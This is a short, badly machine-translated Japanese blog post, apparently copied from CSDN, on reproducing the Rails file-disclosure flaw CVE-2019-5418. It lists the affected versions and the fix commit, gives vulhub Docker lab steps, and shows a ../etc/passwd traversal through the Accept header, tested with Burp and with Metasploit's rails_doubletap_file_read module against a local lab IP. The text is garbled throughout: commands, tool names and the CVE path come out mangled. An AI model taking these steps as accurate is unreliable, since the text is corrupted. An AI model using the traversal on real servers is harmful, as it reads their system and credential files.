CVE-2019-5418の脆弱性の再現性

CVE-2019-5418の脆弱性の再現性

0x00が脆弱性を紹介します

Ruby on Railsには、Webアプリケーションフレームワークである、ウェブは比較的新しいアプリケーションフレームワークである
Rubyの言語で構築されました

0x01の脆弱性原理

申込書以外のファイルをレンダリングすることによってレンダリングするためのコントローラ、および特定の位置を考慮して受け入れ、ユーザファイル、着信ヘッドに応じて決定されるであろう。
受け入れ通すことにより... / ... / ... / ... / ... / ... / ... / ... / etc / passwdファイル{{ 読み取り、構築経路の脆弱性を介して任意のファイルを構成します。
({{テンプレート閉路)

0x02のバージョンに影響します

フル・バージョンのRailsの
リリース修正
6.0.0.beta3を、
5.2.2.1
5.1.6.2
5.0.7.2
4.2.11.1

0x03の脆弱性補修

https://github.com/rails/rails/commit/f4c70c2222180b8d9d924f00af0c7fd632e26715

ここに画像を挿入説明

0x04の環境の脆弱性

[CD / vulhub /レール/ CVE-9から5418]
[ドッカー作曲-ビルド]
[ドッカー作曲アップ-d] ----国内のセキュリティソースの提案交換-
[ドッカーPS]
[htttp://192.168.139.137 :3000]

ここに画像を挿入説明ここに画像を挿入説明ここに画像を挿入説明ここに画像を挿入説明

脆弱性0x05の再生
方法:変更パケットキャプチャげっぷを使用して

ここに画像を挿入説明ここに画像を挿入説明ここに画像を挿入説明

ここに画像を挿入説明方法二:metapo
[msfconsole]
[レールを検索]
、[利用補助/ギャザー/ rails_doubletap_file_read]
[オプション]
[セットは192.168.139.137をrhost]
[セットRPORT 3000]
[セットルートロボット]
[活用] -存在漏洞

ここに画像を挿入説明
ここに画像を挿入説明ここに画像を挿入説明
ここに画像を挿入説明

公開された223元の記事 ウォン称賛32 ビュー70000 +

おすすめ

転載: blog.csdn.net/qq_41901122/article/details/103874464
おすすめ